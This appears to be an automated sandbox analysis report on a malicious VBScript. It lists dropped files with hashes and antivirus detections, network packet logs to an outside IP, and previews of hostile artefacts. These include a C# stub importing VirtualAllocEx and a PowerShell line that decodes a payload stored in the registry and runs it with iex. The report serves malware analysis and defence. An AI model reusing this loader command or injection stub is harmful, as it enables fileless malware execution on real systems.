                                                                                                                                          SSDEEP:3:aTQDBrppxBn:eAF
                                                                                                                                          MD5:BAFCF6766D3A528987DA71E786B3211E
                                                                                                                                          SHA1:42061CFFE74471DE81D6E0F9C2AB09C396F1EE96
                                                                                                                                          SHA-256:B79049E087BD746D519AEBC12B42B0213CE5220D5252076AB9AB2CD988B0BB76
                                                                                                                                          SHA-512:1AC783355FD08DFFF52B0A126E323908C7C5BFDC5D6907108ACA1B78F4D7168156852C3548896C6BB05BAEFA1F02AC4695BA222C6C485B0B8B8983ABE4485481
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: hcYRMguufkKzEvALiMSsd
                                                                                                                                          C:\Users\user\AppData\Local\Temp\marginal.roq
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):48128
                                                                                                                                          Entropy (8bit):7.669222450158645
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:g3onFH7sWxJPhIsa5n5XotJMhv5Mmg0imbr6W:2oBwsmakKmh6W
                                                                                                                                          MD5:BA1A42AFC59951D161F62B6840D32D3D
                                                                                                                                          SHA1:EC7C3F94392C42762C8824D4EC899463F49C3756
                                                                                                                                          SHA-256:7B3B1C04013211B4E056D58004D62DC688F640D802596A69C0E10849FEE95BDD
                                                                                                                                          SHA-512:688EEC7892FE603C0DF6F8A2207CDF4A9EA3D9E922B309ACB1B6538C266680C3DF972250DDFABB03160F47F68369FF162D5BBDFFAC2BB3FCE94FF6BEA1789E14
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                          Preview: MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L...8p._...........!...I..................... ....@.................................H1....@.................................@...X....................................................................................................................text............................... ..`.data........ ......................@....reloc..............................@..B................U..}..u..*.............}..u.1....}..u.1....}..u.1.....SWV..v.h.............^_[.1.H)...v.u..j@h.0..h@...j.....@.Sh@...h. @.P......U..`.}..u..M..U..0......a.........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\reactionary.thm
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):70
                                                                                                                                          Entropy (8bit):5.091723152900814
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:uikdpKz4dutoA+p/h03n:uNvd1NrO
                                                                                                                                          MD5:6C3B412B4826477EC990E994DEAE1B14
                                                                                                                                          SHA1:91BBB9F31680A6AA62FADC94E85103FC97506699
                                                                                                                                          SHA-256:056F5C6328282782230B1096965CE229E5D7B9A27BEE62ABD11F9E487A98721B
                                                                                                                                          SHA-512:D9FAA251A8AC338F098B83CBECCB369C74739DE3B1BB779343874E1A4245870FF8A6268EA138E5DE6F3272C49E5E1E2B1FA9F48037D5AF71C496A010A3187FCA
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: IjebRqKdWLOYanJbVFtMKQIwYTSuiTMsZtBOnbvGjeIjOiaVuAEWzOmGOyqdZqLXUYbDQR
                                                                                                                                          C:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:MSVC .res
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):652
                                                                                                                                          Entropy (8bit):3.098274781959774
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry+ak7Ynqq8PN5Dlq5J:+RI+ycuZhNwakS8PNnqX
                                                                                                                                          MD5:CB27402D1C6ABBCE144FDB0CD4EF2948
                                                                                                                                          SHA1:9A5AAE79EF9B19645DDB1DE161ACBF0ECD50CF29
                                                                                                                                          SHA-256:5073BCE2D884173E0A85387183E4354DD6EB80EF56351FF88A545D3C2022454E
                                                                                                                                          SHA-512:0F946636E1B3F5548FF0FCFA9BDD16948FF2AD04CD9F8D4D6FD9C2A29358CF127D8901A55D13C7D175BDA537A3DFCB644CA0553235AD4B3C80675D6D343ABD7D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.t.p.4.f.h.z.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.t.p.4.f.h.z.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                          C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.0.cs
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):414
                                                                                                                                          Entropy (8bit):5.000775845755204
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:V/DsYLDS81zuJ0VMRSRa+eNMjSSRr5DyBSRHq10iwHRfKFKDDVWQy:V/DTLDfue9eg5r5Xu0zH5rgQy
                                                                                                                                          MD5:216105852331C904BA5D540DE538DD4E
                                                                                                                                          SHA1:EE80274EBF645987E942277F7E0DE23B51011752
                                                                                                                                          SHA-256:408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
                                                                                                                                          SHA-512:602208E375BCD655A21B2FC471C44892E26CA5BE9208B7C8EB431E27D3AAE5079A98DFFE3884A7FF9E46B24FFFC0F696CD468F09E57008A5EB5E8C4C93410B41
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mme. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bxtqajkpwb,uint ytemv);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr nlosdxjodm,IntPtr mvqodpevph,uint tnvcegcf,uint dbt,uint egycoak);.. }..}.
                                                                                                                                          C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):369
                                                                                                                                          Entropy (8bit):5.249164487663631
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fkzxs7+AEszIwkn23fh:p37Lvkmb6KRfcWZEif5
                                                                                                                                          MD5:19E6C58CD10622C223144C18D9BD35AD
                                                                                                                                          SHA1:352924FA43AC485C669CD7E54A008CDB708272F8
                                                                                                                                          SHA-256:13C633BCAE4EEADC8CA432DB095A694CFAC931E8A1B5C942905BBE43F90112B4
                                                                                                                                          SHA-512:A397EB4BF7961B5E0FB7A56233084ED35AF540639AE48353EBD37DC8AE48F49DE6403C37B68C2FA036EB17C486014AEC178BEBB3DB55D6F0D0BAEBC25A9B7291
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.0.cs"
                                                                                                                                          C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.dll
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3584
                                                                                                                                          Entropy (8bit):2.6342807860034836
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:etGSCmM+WEei8MTx2qHtLUyBrfEOdWtGYwxhtkZfGdw7I+ycuZhNwakS8PNnq:6H7qMTxzJUyN8wWQYwSJGU1ulwa3sq
                                                                                                                                          MD5:A54DA3260FC8514F5DAC73481A8DA701
                                                                                                                                          SHA1:B3C3F2FC1BB943F736D8CA75C3E5DAD8C91053E1
                                                                                                                                          SHA-256:FECAE1DD2E993B609DE878972C0A0B221B449BFE75169E1BE288041D5325CBD8
                                                                                                                                          SHA-512:03B5B691606FE01A32F3C8503F6E3DE9C9D0EEF1AE14903F73AF147BEBAB5CF3B855C9F88CD06597E4B69E188C3C8FC8D473F965C32F98C40F92B1026A288DA4
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...............'...................................... 6............ H............ P.....P ......_.........e.....p.....v..........................._.!..._...!._.&..._.......+.....4.:.....6.......H.......P..................................................<Module>.ztp4fhzn.dll.mme.W32.mscor
                                                                                                                                          C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.out
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):412
                                                                                                                                          Entropy (8bit):4.871364761010112
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF135B9A8EB736BB66.TMP
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40217
                                                                                                                                          Entropy (8bit):0.6817838832405612
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:kBqoxKAuvScS+PxzaBAIxZidqIxZidNIxZid+:kBqoxKAuqR+PxzaBAIfidqIfidNIfid+
                                                                                                                                          MD5:9CC706710702B84C06553BA57F390C7F
                                                                                                                                          SHA1:AED5AAA95744981B18B99676823B0CEACCEDF11D
                                                                                                                                          SHA-256:B2A1D1E9BB463F0E38265F734C87D1607AE222B1108CE9DBCE9DB76E5B0F7E1E
                                                                                                                                          SHA-512:FCF9F93D1E725ED260FEC899BA0574CBB2149AF309D8C8D450D1DD722157736EEF5303E9F39DD003836EBDBC920265CC684B2700B7A68D2972F9BFE4A8E480A0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF6A31E5743615C572.TMP
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40097
                                                                                                                                          Entropy (8bit):0.6616799121677559
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:kBqoxKAuqR+RMRqRwRRRaRLDquORDquOGDquOD:TOzOOOD
                                                                                                                                          MD5:7C779D1260CB993D38A34A8088F3C1C0
                                                                                                                                          SHA1:729615B377B51EDF7988DB881A2E2FDA56C6B589
                                                                                                                                          SHA-256:9B976D794ADC110663D49510BCB748486DD5593E2CF5691DF97C6AADB00825A5
                                                                                                                                          SHA-512:D958904C0F519BCD35E9818E2CC0E4416EB1B23E72BF2CCEE3E1A773FF25CA50362E6C22411F89FAC81FDE0D54BC20DF3AC3C7EF963D9D65E030B848161AA723
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DFCF3528861E95EDFF.TMP
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40225
                                                                                                                                          Entropy (8bit):0.6850646467025453
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:kBqoxKAuqR+a8mv85cQPtrYxccQPtrYxzcQPtrYxc:kBqoxKAuqR+a8mv85TG+TG1TG2
                                                                                                                                          MD5:2D4FFE2929BF72627AB91C46A7CA726B
                                                                                                                                          SHA1:CE64983337FEBC66521F426DFAABBBEB5E9CB6C4
                                                                                                                                          SHA-256:D3CAE943046FF1F70EDE93347D0246B7ED0CC362C305C0117F565B88BB9C1392
                                                                                                                                          SHA-512:31AB0ED051FA8376E8A4DB88B3F04D90747AE1F4DA1E307AF81292D93A923C02A0F803CA1C05D5B757A41F4AFC523CD9B22E9C1B7D30A05C700D484EFD83FD98
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DFD243D1994B0C4AD0.TMP
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):13269
                                                                                                                                          Entropy (8bit):0.6169692188834844
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:c9lLh9lLh9lIn9lIn9loBa9loBK9lWBNnuOPCPn2PaOPBFGBFDOPG6LOPGr6:kBqoIBFBzBNnp0nQFBFGBFkG6MGr6
                                                                                                                                          MD5:C635986B886BC083D868596BE7CE04AF
                                                                                                                                          SHA1:7697F9B81DA572770006C23C364AD4ECB43A5B23
                                                                                                                                          SHA-256:582418B578765DA8C4621830BEBC34768C4A0A970165517C5C786E82588E5033
                                                                                                                                          SHA-512:805300C96E16C7C35420CF04EBB2A952650248BC1E04A673F971C6DE8FEA051F494EEEA382CCAC6A9D8271F61CD45C573CEF965CB78CBB9A2F14C6E39431C229
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6}
                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):54
                                                                                                                                          Entropy (8bit):4.058116152062723
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:8RnuXfUZ9VdHddBWD1UEPv:ynuXo9oDeEX
                                                                                                                                          MD5:3949EEE2009C71A43575CD33CD1525DF
                                                                                                                                          SHA1:BA6313E7C1B9A1BAEFDE1FD5B432B6BAE4378B52
                                                                                                                                          SHA-256:D1C7689CD54334F98BFD15BFD71C9C1E8BDEA8AD9243F67F769771D113F1F8EA
                                                                                                                                          SHA-512:44336F22012607FE96E4F83ED4CE1EB946532203BDF6D57CF98F7608BCA2A8C30D275BBC4ED04DD378BE77615EC438AB77979A78675F82FBAA6F9341E601A3E8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 23-11-2020 12:20:16 | "0xb88d3fdf_5fa2c4f12d12f" | 1..
                                                                                                                                          C:\Users\user\Documents\20201123\PowerShell_transcript.405464.YiUpPuBI.20201123121927.txt
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1189
                                                                                                                                          Entropy (8bit):5.318252879290044
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:BxSA87vBZMex2DOXUWOLCHGIYBtLWCHjeTKKjX4CIym1ZJXiOLCHGIYBtZGnxSAf:BZavjMeoORF/CqDYB1ZAFHZZZ
                                                                                                                                          MD5:6AE60B6CC94E67330266DFB6210EFCFD
                                                                                                                                          SHA1:AA9B2E73DEAF83105D2FDD90317B6DA191747262
                                                                                                                                          SHA-256:2BCEAB5A8C9213B4653D609BDC137EF7B5CC98AEC54A032265A1DFF28B7D5A05
                                                                                                                                          SHA-512:2BADE15D8FF36CAB4D3873692CBE3F555A1B816C95DC8AA85BAEB49F5DF7969C1301AED5F7F84734F559132283C9DD3053E4AE87FC5D0562BD841157FAADFB23
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20201123121928..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 405464 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 4604..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201123121928..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..**********************..
                                                                                                                                          \Device\ConDrv
                                                                                                                                          Process:C:\Windows\System32\nslookup.exe
                                                                                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):28
                                                                                                                                          Entropy (8bit):4.039148671903071
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:U+6QlBxAN:U+7BW
                                                                                                                                          MD5:D796BA3AE0C072AA0E189083C7E8C308
                                                                                                                                          SHA1:ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
                                                                                                                                          SHA-256:EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
                                                                                                                                          SHA-512:BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: Non-authoritative answer:...

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                          Entropy (8bit):5.264322263325788
                                                                                                                                          TrID:
                                                                                                                                            File name:2Q4tLHa5wbO1.vbs
                                                                                                                                            File size:376718
                                                                                                                                            MD5:afa1319ab7c53ec14f6e2b5b403d4d08
                                                                                                                                            SHA1:1081298acf917fed6ed090c3d5ed642eef9e0f34
                                                                                                                                            SHA256:7eb2fa04c617f7c2adcfe5f2f6d0fef4dc20d89c30e06158ee1bcb94e5c128a2
                                                                                                                                            SHA512:796915943ea709ea0234911252b4eee6aa15a74709629f2749e397dc3cab70b11996714ab4b2d728d6d8931e83ef5a58b62938f6e62d02d254a5c71d1d4e93a0
                                                                                                                                            SSDEEP:6144:EkksIhqrBIWUpltI+iy2USFBqdNqpqximcH0d1gMGz:HrBz7
                                                                                                                                            File Content Preview:' kinky laundry Danbury wave revving caret Richard Muzo Erato oligoclase march corroboree took halfback Nevada biz octile caddis skyway bimetallic, Titan Tanganyika peccary downy, 1819897 flow escort, 1161344 ONeill bray banquet chenille ploy arteriolos

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:e8d69ece869a9ec4

                                                                                                                                            Network Behavior

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 23, 2020 12:19:07.961834908 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:07.961854935 CET4973380192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:08.222829103 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:08.223010063 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:08.224163055 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:08.239618063 CET804973347.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:08.239754915 CET4973380192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:08.525428057 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.288871050 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.288896084 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.288908958 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.288919926 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.288933039 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.288944960 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.289078951 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.289136887 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.328711033 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.328738928 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.328756094 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.328778028 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.328866959 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.328929901 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.550035954 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.550065041 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.550081968 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.550097942 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.550115108 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.550132990 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.550154924 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.550175905 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.550188065 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.550194025 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.550199986 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.550223112 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.550245047 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.550252914 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.550263882 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.550271988 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.550276995 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.550312042 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.589838982 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.589890957 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.589927912 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.589961052 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.590002060 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.590055943 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.590111017 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.590125084 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.703165054 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.703186989 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.703342915 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.743204117 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.743437052 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.811219931 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.811278105 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.811316013 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.811347008 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.811383963 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.811430931 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.811444998 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.811475039 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.811486006 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.811515093 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.811518908 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.811554909 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.811558008 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.811582088 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.811593056 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.811621904 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.811630964 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.811661959 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.811671019 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.811709881 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.811733007 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.811760902 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.811767101 CET4973280192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:09.811798096 CET804973247.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:09.812103987 CET4973280192.168.2.447.241.19.44
